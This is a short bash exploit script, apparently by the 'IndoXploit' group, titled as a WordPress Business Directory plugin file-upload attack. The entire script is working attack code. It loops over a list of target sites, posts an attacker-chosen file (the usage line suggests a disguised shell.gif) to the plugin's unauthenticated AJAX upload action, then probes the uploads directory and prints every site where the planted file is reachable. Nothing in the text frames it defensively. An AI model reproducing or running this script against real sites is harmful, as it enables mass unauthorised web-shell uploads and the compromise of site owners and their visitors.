WordPress Business Directory Plugin File Upload

1. #!/bin/bash
2. # coded by L0c4lh34rtz - IndoXploit
3. # usage: ./wpb.sh target.txt shell.gif
4.  
5. args=("$@")
6. target=$(pwd)"/"${args[0]}
7. file_=$(pwd)"/"${args[1]}
8. thn=$(date +"%Y")
9. bln=$(date +"%m")
10.  
11. if [ -z "$2" ]
12.     then
13.     echo "usage: wpb.sh target.txt shell.gif"
14. else
15.     for url in $(cat $target)
16.     do
17.         echo "[+] Scanning $url"
18.         vuln="$url/wp-admin/admin-ajax.php?action=wpbdp-file-field-upload"
19.         shell="$url/wp-content/uploads/$thn/$bln/"$(basename "$file_")
20.  
21.         curl -s -k -H "User-Agent: indoxploit" -F "file=@$file_" "$vuln" -o /dev/null
22.         check=$(curl -s -k -w "%{http_code}" -H "User-Agent: indoxploit" "$shell" -o /dev/null)
23.  
24.         if (($check == 200))
25.             then
26.             echo -e "\e[92m$shell\e[0m"
27.         fi
28.     done
29. fi